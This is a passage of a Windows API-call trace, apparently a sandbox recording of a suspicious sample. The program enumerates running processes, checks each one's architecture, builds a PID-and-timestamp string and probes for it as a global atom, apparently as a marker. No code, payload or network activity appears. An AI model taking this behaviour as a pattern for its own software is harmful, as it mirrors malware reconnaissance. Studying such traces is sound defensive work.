	[0073.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.771] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.771] CloseHandle (hObject=0x224) returned 1
	[0073.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.771] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.771] CloseHandle (hObject=0x224) returned 1
	[0073.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.771] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.771] CloseHandle (hObject=0x224) returned 1
	[0073.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.772] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.772] CloseHandle (hObject=0x224) returned 1
	[0073.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.772] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.772] CloseHandle (hObject=0x224) returned 1
	[0073.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.772] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.772] CloseHandle (hObject=0x224) returned 1
	[0073.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728978, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.772] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.772] CloseHandle (hObject=0x224) returned 1
	[0073.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.773] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.773] CloseHandle (hObject=0x224) returned 1
	[0073.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dbb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.773] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.773] CloseHandle (hObject=0x224) returned 1
	[0073.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.773] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.773] CloseHandle (hObject=0x224) returned 1
	[0073.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.773] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.773] CloseHandle (hObject=0x224) returned 1
	[0073.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.774] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.774] CloseHandle (hObject=0x224) returned 1
	[0073.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.774] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.774] CloseHandle (hObject=0x224) returned 1
	[0073.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.774] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.774] CloseHandle (hObject=0x224) returned 1
	[0073.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.774] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.774] CloseHandle (hObject=0x224) returned 1
	[0073.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.774] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.774] CloseHandle (hObject=0x224) returned 1
	[0073.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.775] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.775] CloseHandle (hObject=0x224) returned 1
	[0073.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.775] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.775] CloseHandle (hObject=0x224) returned 1
	[0073.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.775] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.775] CloseHandle (hObject=0x224) returned 1
	[0073.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.775] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.775] CloseHandle (hObject=0x224) returned 1
	[0073.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.775] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.776] CloseHandle (hObject=0x224) returned 1
	[0073.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.776] CloseHandle (hObject=0x224) returned 1
	[0073.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.776] CloseHandle (hObject=0x224) returned 1
	[0073.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a38, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.776] CloseHandle (hObject=0x224) returned 1
	[0073.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e798, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.776] CloseHandle (hObject=0x224) returned 1
	[0073.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e770, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.777] CloseHandle (hObject=0x224) returned 1
	[0073.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.777] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.778] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.778] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.778] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.779] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetLastError () returned 0x5
	[0073.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.780] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.781] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.781] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.781] CloseHandle (hObject=0x224) returned 1
	[0073.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.781] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.781] CloseHandle (hObject=0x224) returned 1
	[0073.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e810, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.781] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.781] CloseHandle (hObject=0x224) returned 1
	[0073.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.825] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
